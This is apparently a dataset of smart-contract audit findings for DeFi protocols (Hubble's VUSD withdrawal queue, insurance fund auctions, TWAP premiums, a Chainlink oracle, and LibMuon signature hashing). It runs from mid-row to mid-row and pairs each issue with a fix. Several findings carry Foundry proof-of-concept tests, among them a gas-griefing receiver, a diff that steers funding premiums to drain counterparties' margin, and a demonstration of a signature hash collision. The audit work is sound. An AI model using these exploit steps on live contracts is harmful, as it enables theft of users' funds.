{\\n event WithdrawalFailed(address indexed trader, uint amount, bytes data);\\n\\n function setUp() public {\\n setupContracts();\\n }\\n\\n function test_CannotProcessWithdrawals(uint128 amount) public {\\n MaliciousReceiver r = new MaliciousReceiver();\\n\\n vm.assume(amount >= 5e6);\\n // mint vusd for this contract\\n mintVusd(address(this), amount);\\n // alice and bob also mint vusd\\n mintVusd(alice, amount);\\n mintVusd(bob, amount);\\n\\n // withdraw husd\\n husd.withdraw(amount); // first withdraw in the array\\n vm.prank(alice);\\n husd.withdraw(amount);\\n vm.prank(bob); // Bob is the malicious user and he wants to withdraw the VUSD to his smart contract\\n husd.withdrawTo(address(r), amount);\\n\\n assertEq(husd.withdrawalQLength(), 3);\\n assertEq(husd.start(), 0);\\n\\n husd.processWithdrawals(); // This doesn't fail on foundry because foundry's gas limit is way higher than ethereum's. \\n\\n uint256 ethereumSoftGasLimit = 30_000_000;\\n assertGt(r.gas(), ethereumSoftGasLimit); // You can only transfer at most 63/64 gas to an external call and the fact that the recorded amt of gas is > 30m shows that processWithdrawals will always revert when called on mainnet. \\n }\\n\\n receive() payable external {\\n assertEq(msg.sender, address(husd));\\n }\\n}\\n```\\n" +Failed withdrawals from VUSD#processWithdrawals will be lost forever,high,"When withdrawals fail inside VUSD#processWithdrawals they are permanently passed over and cannot be retried. The result is that any failed withdrawal will be lost forever.\\nVUSD.sol#L75-L81\\n```\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}("""");\\n if (success) {\\n reserve -= withdrawal.amount;\\n } else {\\n emit WithdrawalFailed(withdrawal.usr, withdrawal.amount, data);\\n }\\n i += 1;\\n```\\n\\nIf the call to withdrawal.usr fails the contract will simply emit an event and continue on with its cycle. Since there is no way to retry withdrawals, these funds will be permanently lost.",Cache failed withdrawals and allow them to be retried or simply send VUSD to the user if it fails.,Withdrawals that fail will be permanently locked,"```\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}("""");\\n if (success) {\\n reserve -= withdrawal.amount;\\n } else {\\n emit WithdrawalFailed(withdrawal.usr, withdrawal.amount, data);\\n }\\n i += 1;\\n```\\n" +Malicious user can frontrun withdrawals from Insurance Fund to significantly decrease value of shares,medium,"When a user withdraws from the insurance fund, the value of their shares is calculated based on the balance of vUSD in the fund. Another user could deliberately frontrun (or frontrun by chance) the withdrawal with a call to `settleBadDebt` to significantly reduce the vUSD returned from the withdrawal with the same number of shares.\\nWhen a user wants to `withdraw` from the insurance pool they have to go through a 2 step withdrawal process. First they need to unbond their shares, and then they have to wait for the pre-determined unbonding period before they can `withdraw` the vUSD their shares are worth by calling `withdraw`.\\nWhen a user calls `withdraw` the amount of vUSD to redeem is calculated as:\\n```\\namount = balance() * shares / totalSupply();\\n```\\n\\nwhere `balance()` is the balance of vUSD in the contract and `totalSupply()` is the total supply of share tokens. Therefore, if the balance of vUSD in the contract were to decrease, then the amount of vUSD redeemed from the same number of shares would decrease as a result.\\nThis occurs when a trader's bad debt is settled when calling `settleBadDebt` in `MarginAccount.sol` as this calls `insuranceFund.seizeBadDebt` under the hood, which in turn calls `settlePendingObligation` which transfers vUSD out of the insurance fund to the margin account:\\n```\\nvusd.safeTransfer(marginAccount, toTransfer);\\n```\\n\\nThe result is now that the balance of vUSD in the insurance fund is lower and thus the shares are worth less vUSD as a consequence.","One option would be to include a slippage parameter on the `withdraw` and `withdrawFor` methods so that the user redeeming shares can specify the minimum amount of vUSD they would accept for their shares.\\nWhen depositing into the insurance fund, the number of shares to mint is actually calculated based on the total value of the pool (value of vUSD and all other collateral assets). Therefore, the withdraw logic could also use `_totalPoolValue` instead of `balance()` to get a ""true"" value per share, however this could lead to withdrawals failing while assets are up for auction. Assuming all the assets are expected to be sold within the short 2 hour auction duration, this is probably the better solution given the pricing is more accurate, but it depends if users would accept failed withdrawals for short periods of time.",A user withdrawing from the insurance fund could receive significantly less (potentially 0) vUSD when finalising their withdrawal.,```\\namount = balance() * shares / totalSupply();\\n```\\n +min withdraw of 5 VUSD is not enough to prevent DOS via VUSD.sol#withdraw(amount),medium,"A vulnerability exists where a malicious user spam the contract with numerous withdrawal requests (e.g., 5,000). This would mean that genuine users who wish to withdraw their funds may find themselves unable to do so in a timely manner because the processing of their withdrawals could be delayed significantly.\\nThe issue stems from the fact that there is no restriction on the number of withdrawal requests a single address can make. A malicious actor could repeatedly call the withdraw or withdrawTo function, each time with a small amount (min 5 VUSD), to clog the queue with their withdrawal requests.\\n```\\n //E Burn vusd from msg.sender and queue the withdrawal to ""to"" address\\n function _withdrawTo(address to, uint amount) internal {\\n //E check min amount\\n require(amount >= 5 * (10 ** 6), ""min withdraw is 5 vusd""); //E @audit-info not enough to prevent grief\\n //E burn this amount from msg.sender\\n burn(amount); // burn vusd from msg.sender\\n //E push \\n withdrawals.push(Withdrawal(to, amount * 1e12));\\n }\\n```\\n\\nGiven the maxWithdrawalProcesses is set to 100, and the withdrawal processing function processWithdrawals doesn't have any parameter to process from a specific index in the queue, only the first 100 requests in the queue would be processed at a time.\\n```\\n uint public maxWithdrawalProcesses = 100;\\n //E create array of future withdrawal that will be executed to return\\n function withdrawalQueue() external view returns(Withdrawal[] memory queue) {\\n //E check if more than 100 requests in withdrawals array\\n uint l = _min(withdrawals.length-start, maxWithdrawalProcesses);\\n queue = new Withdrawal[](l);\\n\\n for (uint i = 0; i < l; i++) {\\n queue[i] = withdrawals[start+i];\\n }\\n }\\n```\\n\\nIn the case of an attack, the first 100 withdrawal requests could be those of the attacker, meaning that the genuine users' requests would be stuck in the queue until all of the attacker's requests have been processed. Moreover the fact that we can only withdraw up to 1 day long when our withdraw request is good to go.",Either limit number of withdrawal requests per address could be a first layer of defense even if it's not enough but I don't see the point why this limit is included so removing it could mitigate this. Otherwise you could implement a priority queue regarding amount to be withdrawn,"This could result in significant delays for genuine users wanting to withdraw their funds, undermining the contract's usability and users' trust in the platform.","```\\n //E Burn vusd from msg.sender and queue the withdrawal to ""to"" address\\n function _withdrawTo(address to, uint amount) internal {\\n //E check min amount\\n require(amount >= 5 * (10 ** 6), ""min withdraw is 5 vusd""); //E @audit-info not enough to prevent grief\\n //E burn this amount from msg.sender\\n burn(amount); // burn vusd from msg.sender\\n //E push \\n withdrawals.push(Withdrawal(to, amount * 1e12));\\n }\\n```\\n" +Malicious user can control premium emissions to steal margin from other traders,medium,"A malicious user can force premiums to be applied in a positive direction for their positions. They can effectively steal margin from other traders that have filled the other side of their positions.\\nThis vulnerability stems from how the premiums are calculated when `settleFunding` is called in AMM.sol:\\n```\\nint256 premium = getMarkPriceTwap() - underlyingPrice;\\n```\\n\\nEffectively, the premium for a position is calculated based on the difference between the perpetual maker TWAP and the oracle TWAP. Under the hood, `getMarkPriceTwap` calls `_calcTwap`, which calculates the TWAP price from the last hour to the current block timestamp:\\n```\\n uint256 currentPeriodStart = (_blockTimestamp() / spotPriceTwapInterval) * spotPriceTwapInterval;\\n uint256 lastPeriodStart = currentPeriodStart - spotPriceTwapInterval;\\n\\n // If there is no trade in the last period, return the last trade price\\n if (markPriceTwapData.lastTimestamp <= lastPeriodStart) {\\n return markPriceTwapData.lastPrice;\\n }\\n\\n /**\\n * check if there is any trade after currentPeriodStart\\n * since this function will not be called before the nextFundingTime,\\n * we can use the lastPeriodAccumulator to calculate the twap if there is a trade after currentPeriodStart\\n */\\n if (markPriceTwapData.lastTimestamp >= currentPeriodStart) {\\n // use the lastPeriodAccumulator to calculate the twap\\n twap = markPriceTwapData.lastPeriodAccumulator / spotPriceTwapInterval;\\n } else {\\n // use the accumulator to calculate the twap\\n uint256 currentAccumulator = markPriceTwapData.accumulator + (currentPeriodStart - markPriceTwapData.lastTimestamp) * markPriceTwapData.lastPrice;\\n twap = currentAccumulator / spotPriceTwapInterval;\\n }\\n```\\n\\nThis method works closely in conjunction with `_updateTWAP` which is called every time a new position is opened based on the fill price. I'll talk more about his in the ""Recommendation"" section, but the core issue is that too much weight is placed on the last price that was filled, along with the fact the user can open uncapped positions. As can be seen from the `_calcTwap` method above, if there has not been a recently opened position, then the TWAP is determined as the last filled price. And naturally, a time weighted price isn't weighted by the size of a fill as well, so the size of the last fill has no impact.\\nAs a result of this, a malicious user can place orders (which should then be executed by the validators) at a price that maximises the difference between the market TWAP and the oracle TWAP in order to maximise the premiums generated in the market. If the malicious user opens up a large enough position, the premiums generated exceed the taker/maker fees for opening positions. And since the same user can place orders for both sides of the market, they do not need to increase their margin requirement over time in order to meet the minimum margin requirements. Effectively the user is able to generate free revenue assuming the price of the underlying asset doesn't significantly deviate in the opposite direction of the large position held by the user.\\nBelow is a diff to the existing test suite with a test case that shows how a malicious user could control premiums to make a profit. It can be run with forge test -vvv --match-path test/foundry/OrderBook.t.sol:\\n```\\ndiff --git a/hubble-protocol/test/foundry/OrderBook.t.sol b/hubble-protocol/test/foundry/OrderBook.t.sol\\nindex b4dafdf..f5d36b2 100644\\n--- a/hubble-protocol/test/foundry/OrderBook.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/hubble-protocol/test/foundry/OrderBook.t.sol\\n@@ -228,6 // Add the line below\\n228,60 @@ contract OrderBookTests is Utils {\\n assertPositions(bob, -size, quote, 0, quote * 1e18 / stdMath.abs(size));\\n }\\n \\n// Add the line below\\n function testUserCanControlEmissions() public {\\n// Add the line below\\n uint256 price = 1e6;\\n// Add the line below\\n oracle.setUnderlyingPrice(address(wavax), int(uint(price)));\\n// Add the line below\\n\\n// Add the line below\\n // Calculate how much margin required for 100x MIN_SIZE\\n// Add the line below\\n uint256 marginRequired = orderBook.getRequiredMargin(100 * MIN_SIZE, price) * 1e18 / uint(defaultWethPrice) // Add the line below\\n 1e10; // required weth margin in 1e18, add 1e10 for any precision loss\\n// Add the line below\\n \\n// Add the line below\\n // Let's say Alice is our malicious user, and Bob is a normal user\\n// Add the line below\\n addMargin(alice, marginRequired, 1, address(weth));\\n// Add the line below\\n addMargin(bob, marginRequired, 1, address(weth));\\n// Add the line below\\n\\n// Add the line below\\n // Alice places a large legitimate long order that is matched with a short order from Bob\\n// Add the line below\\n placeAndExecuteOrder(0, aliceKey, bobKey, MIN_SIZE * 90, price, true, false, MIN_SIZE * 90, false);\\n// Add the line below\\n\\n// Add the line below\\n // Alice's free margin is now pretty low\\n// Add the line below\\n int256 availabeMargin = marginAccount.getAvailableMargin(alice);\\n// Add the line below\\n assertApproxEqRel(availabeMargin, 200410, 0.1e18); // Assert within 10%\\n// Add the line below\\n\\n// Add the line below\\n // Calculate what's the least we could fill an order for given the oracle price\\n// Add the line below\\n uint256 spreadLimit = amm.maxOracleSpreadRatio();\\n// Add the line below\\n uint minPrice = price * (1e6 - spreadLimit) / 1e6;\\n// Add the line below\\n\\n// Add the line below\\n // Alice can fill both sides of an order at the minimum fill price calculated above, with the minimum size\\n// Add the line below\\n // Alice would place such orders (and hopefully have them executed) just after anyone else makes an order in a period (1 hour)\\n// Add the line below\\n // The goal for Alice is to keep the perpetual TWAP as low as possible vs the oracle TWAP (since she holds a large long position)\\n// Add the line below\\n // In quiet market conditions Alice just has to make sure she's the last person to fill\\n// Add the line below\\n // In busy market conditions Alice would fill an order immediately after anyone else fills an order\\n// Add the line below\\n // In this test Alice fills an order every 2 periods, but in reality, if nobody was trading then Alice wouldn't have to do anything provided she was the last filler\\n// Add the line below\\n for (uint i = 0; i < 100; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n uint256 currentPeriodStart = (block.timestamp / 1 hours) * 1 hours;\\n// Add the line below\\n\\n// Add the line below\\n // Warp to before the end of the period\\n// Add the line below\\n vm.warp(currentPeriodStart // Add the line below\\n 3590);\\n// Add the line below\\n \\n// Add the line below\\n // Place and execute both sides of an order as Alice\\n// Add the line below\\n // Alice can do this because once both sides of the order are executed, the effect to her free margin is 0\\n// Add the line below\\n // As mentioned above, Alice would place such orders every time after another order is executed\\n// Add the line below\\n placeAndExecuteOrder(0, aliceKey, aliceKey, MIN_SIZE, minPrice, true, false, MIN_SIZE, false);\\n// Add the line below\\n \\n// Add the line below\\n // Warp to the start of the next period\\n// Add the line below\\n vm.warp(currentPeriodStart // Add the line below\\n (3600 * 2) // Add the line below\\n 10);\\n// Add the line below\\n \\n// Add the line below\\n // Funding is settled. This calculates the premium emissions by comparing the perpetual twap with the oracle twap\\n// Add the line below\\n orderBook.settleFunding();\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // Alice's margin is now significantly higher (after just 200 hours) because she's been pushing the premiums in her direction\\n// Add the line below\\n availabeMargin = marginAccount.getAvailableMargin(alice);\\n// Add the line below\\n assertApproxEqRel(availabeMargin, 716442910, 0.1e18); // Assert within 10%\\n// Add the line below\\n\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testLiquidateAndExecuteOrder(uint64 price, uint120 size_) public {\\n vm.assume(price > 10 && size_ != 0);\\n oracle.setUnderlyingPrice(address(wavax), int(uint(price)));\\n```\\n","I originally thought the best way to mitigate this kind of attack is to scale the TWAP calculation based on the filled amount vs the total fill amount of the whole market. However the downside with this approach is that the fill amount will perpetually increase (given it's a perpetual market after all!) and so the market TWAP deviations from the oracle TWAP would decrease and so the premium emissions would also decrease over time. This could be argued as a feature in that early users receive a larger premium than later users.\\nUpon further thought I think the best way to prevent this kind of attack is simply to disincentivise the malicious user from doing so; by making this a net-loss situation. This can be done with a combination of the following:\\nIncreasing minimum order size\\nIncreasing trader/maker fees\\nIntroducing another fixed fee per order (rather than only variable rate fees)\\nCapping the maximum position size (both long and short)\\nReducing the maximum price deviation of fill prices from oracle price\\nIncreasing the minimum margin requirements\\nThis will vary per perpetual market, but the key thing that needs to be accomplished is that the cost to a user to place orders to control the market TWAP is greater than the premium that can be obtained from their position. This will also require some estimates as to how frequently users are going to be placing orders. If orders are relatively infrequent then increasing the TWAP calculation from 1 hour will also help with this.\\nIt is also worth considering whether the following lines in `_calcTwap` are overly weighted towards the last fill price:\\n```\\n // If there is no trade in the last period, return the last trade price\\n if (markPriceTwapData.lastTimestamp <= lastPeriodStart) {\\n return markPriceTwapData.lastPrice;\\n }\\n```\\n\\nYou could make the argument that if no trades have occurred in a significant period of time then the market TWAP should revert back to the oracle TWAP and premium emissions should halt. This could either be after one empty period, or X number of empty periods to be defined by Hubble.\\nFinally, having a trader able to hold both sides of the same perpetual in the same order makes this attack easier to implement, so it might be worth adding an extra check to prevent this. However it's worth noting the same could be achieved with 2 accounts assuming they alternated the long/short positions between them to avoid excessive margin requirements. So I'm not sure this is strictly necessary.","A user can effectively steal funds from other traders that are filling the other side of their positions. The larger the position the malicious user is able to fill and the longer the period, the more funds can be credited to the malicious user's margin account.",```\\nint256 premium = getMarkPriceTwap() - underlyingPrice;\\n```\\n +Malicious user can grief withdrawing users via VUSD reentrancy,medium,"VUSD#processWithdraw makes a call to withdrawal.usr to send the withdrawn gas token. processWithdrawals is the only nonreentrant function allowing a user to create a smart contract that uses it's receive function to deposit then immediately withdraw to indefinitely lengthen the withdrawal queue and waste large amounts of caller gas.\\nVUSD.sol#L69-L77\\n```\\n while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) {\\n Withdrawal memory withdrawal = withdrawals[i];\\n if (reserve < withdrawal.amount) {\\n break;\\n }\\n\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}("""");\\n if (success) {\\n reserve -= withdrawal.amount;\\n```\\n\\nTo send the withdrawn gas token to the user VUSD#processWithdrawals utilizes a call with no data. When received by a contract this will trigger it's receive function. This can be abused to continually grief users who withdraw with no recurring cost to the attacker. To exploit this the attacker would withdraw VUSD to a malicious contract. This contract would deposit the received gas token then immediately withdraw it. This would lengthen the queue. Since the queue is first-in first-out a user would be forced to process all the malicious withdrawals before being able to process their own. While processing them they would inevitably reset the grief for the next user.\\nNOTE: I am submitting this as a separate issue apart from my other two similar issues. I believe it should be a separate issue because even though the outcome is similar the root cause is entirely different. Those are directly related to the incorrect call parameters while the root cause of this issue is that both mintWithReserve and withdraw/withdrawTo lack the reentrant modifier allowing this malicious reentrancy.",Add the nonreentrant modifer to mintWithReserve withdraw and withdrawTo,Malicious user can maliciously reenter VUSD to grief users via unnecessary gas wastage,"```\\n while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) {\\n Withdrawal memory withdrawal = withdrawals[i];\\n if (reserve < withdrawal.amount) {\\n break;\\n }\\n\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}("""");\\n if (success) {\\n reserve -= withdrawal.amount;\\n```\\n" +Malicious users can donate/leave dust amounts of collateral in contract during auctions to buy other collateral at very low prices,medium,"Auctions are only ended early if the amount of the token being auctioned drops to 0. This can be exploited via donation or leaving dust in the contract to malicious extend the auction and buy further liquidate collateral at heavily discounted prices.\\nInsuranceFund.sol#L184-L199\\n```\\nfunction buyCollateralFromAuction(address token, uint amount) override external {\\n Auction memory auction = auctions[token];\\n // validate auction\\n require(_isAuctionOngoing(auction.startedAt, auction.expiryTime), ""IF.no_ongoing_auction"");\\n\\n // transfer funds\\n uint vusdToTransfer = _calcVusdAmountForAuction(auction, token, amount);\\n address buyer = _msgSender();\\n vusd.safeTransferFrom(buyer, address(this), vusdToTransfer);\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n // close auction if no collateral left\\n if (IERC20(token).balanceOf(address(this)) == 0) { <- @audit-issue only cancels auction if balance = 0\\n auctions[token].startedAt = 0;\\n }\\n}\\n```\\n\\nWhen buying collateral from an auction, the auction is only closed if the balance of the token is 0. This can be exploited in a few ways to maliciously extend auctions and keep the timer (and price) decreasing. The first would be buy all but 1 wei of a token leaving it in the contract so the auction won't close. Since 1 wei isn't worth the gas costs to buy, there would be a negative incentive to buy the collateral, likely resulting in no on buying the final amount. A second approach would be to frontrun an buys with a single wei transfer with the same results.\\nNow that the auction has been extended any additional collateral added during the duration of the auction will start immediately well below the assets actual value. This allows malicious users to buy the asset for much cheaper, causing loss to the insurance fund.","Close the auction if there is less than a certain threshold of a token remaining after it has been bought:\\n```\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n+ uint256 minRemainingBalance = 1 * 10 ** (IERC20(token).decimal() - 3);\\n\\n // close auction if no collateral left\\n+ if (IERC20(token).balanceOf(address(this)) <= minRemainingBalance) {\\n auctions[token].startedAt = 0;\\n }\\n```\\n",Users can maliciously extend auctions and potentially get collateral for very cheap,"```\\nfunction buyCollateralFromAuction(address token, uint amount) override external {\\n Auction memory auction = auctions[token];\\n // validate auction\\n require(_isAuctionOngoing(auction.startedAt, auction.expiryTime), ""IF.no_ongoing_auction"");\\n\\n // transfer funds\\n uint vusdToTransfer = _calcVusdAmountForAuction(auction, token, amount);\\n address buyer = _msgSender();\\n vusd.safeTransferFrom(buyer, address(this), vusdToTransfer);\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n // close auction if no collateral left\\n if (IERC20(token).balanceOf(address(this)) == 0) { <- @audit-issue only cancels auction if balance = 0\\n auctions[token].startedAt = 0;\\n }\\n}\\n```\\n" +MarginAccountHelper will be bricked if registry.marginAccount or insuranceFund ever change,medium,"MarginAccountHelper#syncDeps causes the contract to refresh it's references to both marginAccount and insuranceFund. The issue is that approvals are never made to the new contracts rendering them useless.\\nMarginAccountHelper.sol#L82-L87\\n```\\nfunction syncDeps(address _registry) public onlyGovernance {\\n IRegistry registry = IRegistry(_registry);\\n vusd = IVUSD(registry.vusd());\\n marginAccount = IMarginAccount(registry.marginAccount());\\n insuranceFund = IInsuranceFund(registry.insuranceFund());\\n}\\n```\\n\\nWhen syncDeps is called the marginAccount and insuranceFund references are updated. All transactions require approvals to one of those two contract. Since no new approvals are made, the contract will become bricked and all transactions will revert.",Remove approvals to old contracts before changing and approve new contracts after,Contract will become bricked and all contracts that are integrated or depend on it will also be bricked,```\\nfunction syncDeps(address _registry) public onlyGovernance {\\n IRegistry registry = IRegistry(_registry);\\n vusd = IVUSD(registry.vusd());\\n marginAccount = IMarginAccount(registry.marginAccount());\\n insuranceFund = IInsuranceFund(registry.insuranceFund());\\n}\\n```\\n +No `minAnswer/maxAnswer` Circuit Breaker Checks while Querying Prices in Oracle.sol,medium,"The Oracle.sol contract, while currently applying a safety check (this can be side stepped, check my other submission ) to ensure returned prices are greater than zero, which is commendable, as it effectively mitigates the risk of using negative prices, there should be an implementation to ensure the returned prices are not at the extreme boundaries (minAnswer and maxAnswer). Without such a mechanism, the contract could operate based on incorrect prices, which could lead to an over- or under-representation of the asset's value, potentially causing significant harm to the protocol.\\nChainlink aggregators have a built in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (i.e. LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow user to continue borrowing with the asset but at the wrong price. This is exactly what happened to Venus on BSC when LUNA imploded. In its current form, the `getUnderlyingPrice()` function within the Oracle.sol contract retrieves the latest round data from Chainlink, if the asset's market price plummets below `minAnswer` or skyrockets above `maxAnswer`, the returned price will still be `minAnswer` or `maxAnswer`, respectively, rather than the actual market price. This could potentially lead to an exploitation scenario where the protocol interacts with the asset using incorrect price information.\\nTake a look at Oracle.sol#L106-L123:\\n```\\n function getLatestRoundData(AggregatorV3Interface _aggregator)\\n internal\\n view\\n returns (\\n uint80,\\n uint256 finalPrice,\\n uint256\\n )\\n {\\n (uint80 round, int256 latestPrice, , uint256 latestTimestamp, ) = _aggregator.latestRoundData();\\n finalPrice = uint256(latestPrice);\\n if (latestPrice <= 0) {\\n requireEnoughHistory(round);\\n (round, finalPrice, latestTimestamp) = getRoundData(_aggregator, round - 1);\\n }\\n return (round, finalPrice, latestTimestamp);\\n }\\n```\\n\\nIllustration:\\nPresent price of TokenA is $10\\nTokenA has a minimum price set at $1 on chainlink\\nThe actual price of TokenA dips to $0.10\\nThe aggregator continues to report $1 as the price.\\nConsequently, users can interact with protocol using TokenA as though it were still valued at $1, which is a tenfold overestimate of its real market value.","Since there is going to be a whitelist of tokens to be added, the minPrice/maxPrice could be checked and a revert could be made when this is returned by chainlink or a fallback oracle that does not have circuit breakers could be implemented in that case",The potential for misuse arises when the actual price of an asset drastically changes but the oracle continues to operate using the `minAnswer` or `maxAnswer` as the asset's price. In the case of it going under the `minAnswer` malicious actors obviously have the upperhand and could give their potential going to zero worth tokens to protocol,"```\\n function getLatestRoundData(AggregatorV3Interface _aggregator)\\n internal\\n view\\n returns (\\n uint80,\\n uint256 finalPrice,\\n uint256\\n )\\n {\\n (uint80 round, int256 latestPrice, , uint256 latestTimestamp, ) = _aggregator.latestRoundData();\\n finalPrice = uint256(latestPrice);\\n if (latestPrice <= 0) {\\n requireEnoughHistory(round);\\n (round, finalPrice, latestTimestamp) = getRoundData(_aggregator, round - 1);\\n }\\n return (round, finalPrice, latestTimestamp);\\n }\\n```\\n" +setSymbolsPrice() can use the priceSig from a long time ago,high,"`setSymbolsPrice()` only restricts the maximum value of `priceSig.timestamp`, but not the minimum time This allows a malicious user to choose a malicious `priceSig` from a long time ago A malicious `priceSig.upnl` can seriously harm `partyB`\\n`setSymbolsPrice()` only restricts the maximum value of `priceSig.timestamp`, but not the minimum time\\n```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n ""LiquidationFacet: Expired signature""\\n );\\n```\\n\\nLibMuon.verifyPrices only check sign, without check the time range\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, ""LibMuon: Invalid length"");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n\\nIn this case, a malicious user may pick any `priceSig` from a long time ago, and this `priceSig` may have a large negative `unpl`, leading to `LiquidationType.OVERDUE`, severely damaging `partyB`\\nWe need to restrict `priceSig.timestamp` to be no smaller than `maLayout.liquidationTimestamp[partyA]` to avoid this problem","restrict `priceSig.timestamp` to be no smaller than `maLayout.liquidationTimestamp[partyA]`\\n```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(maLayout.liquidationStatus[partyA], ""LiquidationFacet: PartyA is solvent"");\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n ""LiquidationFacet: Expired signature""\\n );\\n+ require(priceSig.timestamp >= maLayout.liquidationTimestamp[partyA],""invald price timestamp"");\\n```\\n",Maliciously choosing the illegal `PriceSig` thus may hurt others user,"```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n ""LiquidationFacet: Expired signature""\\n );\\n```\\n" +LibMuon Signature hash collision,high,"In `LibMuon` , all signatures do not distinguish between type prefixes, and `abi.encodePacked` is used when calculating the hash Cause when `abi.encodePacked`, if there is a dynamic array, different structures but the same hash value may be obtained Due to conflicting hash values, signatures can be substituted for each other, making malicious use of illegal signatures possible\\nThe following two methods are examples\\n1.verifyPrices:\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, ""LibMuon: Invalid length"");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n\\n2.verifyPartyAUpnlAndPrice\\n```\\n function verifyPartyAUpnlAndPrice(\\n SingleUpnlAndPriceSig memory upnlSig,\\n address partyA,\\n uint256 symbolId\\n ) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n// require(\\n// block.timestamp <= upnlSig.timestamp + muonLayout.upnlValidTime,\\n// ""LibMuon: Expired signature""\\n// );\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n upnlSig.reqId,\\n address(this),\\n partyA,\\n AccountStorage.layout().partyANonces[partyA],\\n upnlSig.upnl,\\n symbolId,\\n upnlSig.price,\\n upnlSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, upnlSig.sigs, upnlSig.gatewaySignature);\\n }\\n```\\n\\nWe exclude the same common part (muonAppId/reqId/address (this)/timestamp/getChainId ())\\nThrough the following simplified test code, although the structure is different, the hash value is the same at that time\\n```\\n function test() external {\\n address verifyPrices_partyA = address(0x1);\\n int256 verifyPrices_upnl = 100;\\n int256 verifyPrices_totalUnrealizedLoss = 100;\\n uint256 [] memory verifyPrices_symbolIds = new uint256[](1);\\n verifyPrices_symbolIds[0]=1;\\n uint256 [] memory verifyPrices_prices = new uint256[](1);\\n verifyPrices_prices[0]=1000; \\n\\n bytes32 verifyPrices = keccak256(abi.encodePacked(\\n verifyPrices_partyA,\\n verifyPrices_upnl,\\n verifyPrices_totalUnrealizedLoss,\\n verifyPrices_symbolIds,\\n verifyPrices_prices\\n ));\\n\\n address verifyPartyAUpnlAndPrice_partyA = verifyPrices_partyA;\\n int256 verifyPartyAUpnlAndPrice_partyANonces = verifyPrices_upnl;\\n int256 verifyPartyAUpnlAndPrice_upnl = verifyPrices_totalUnrealizedLoss;\\n uint256 verifyPartyAUpnlAndPrice_symbolId = verifyPrices_symbolIds[0];\\n uint256 verifyPartyAUpnlAndPrice_price = verifyPrices_prices[0];\\n\\n\\n bytes32 verifyPartyAUpnlAndPrice = keccak256(abi.encodePacked(\\n verifyPartyAUpnlAndPrice_partyA,\\n verifyPartyAUpnlAndPrice_partyANonces,\\n verifyPartyAUpnlAndPrice_upnl,\\n verifyPartyAUpnlAndPrice_symbolId,\\n verifyPartyAUpnlAndPrice_price\\n ));\\n\\n console.log(""verifyPrices == verifyPartyAUpnlAndPrice:"",verifyPrices == verifyPartyAUpnlAndPrice);\\n\\n }\\n```\\n\\n```\\n$ forge test -vvv\\n\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] test() (gas: 4991)\\nLogs:\\n verifyPrices == verifyPartyAUpnlAndPrice: true\\n\\nTest result: ok. 1 passed; 0 failed; finished in 11.27ms\\n```\\n\\nFrom the above test example, we can see that the `verifyPrices` and `verifyPartyAUpnlAndPrice` signatures can be used interchangeably If we get a legal `verifyPartyAUpnlAndPrice` , it can be used as the signature of `verifyPrices ()` Use `partyANonces` as `upnl`, etc","It is recommended to add the prefix of the hash, or use `api.encode` Such as:\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = 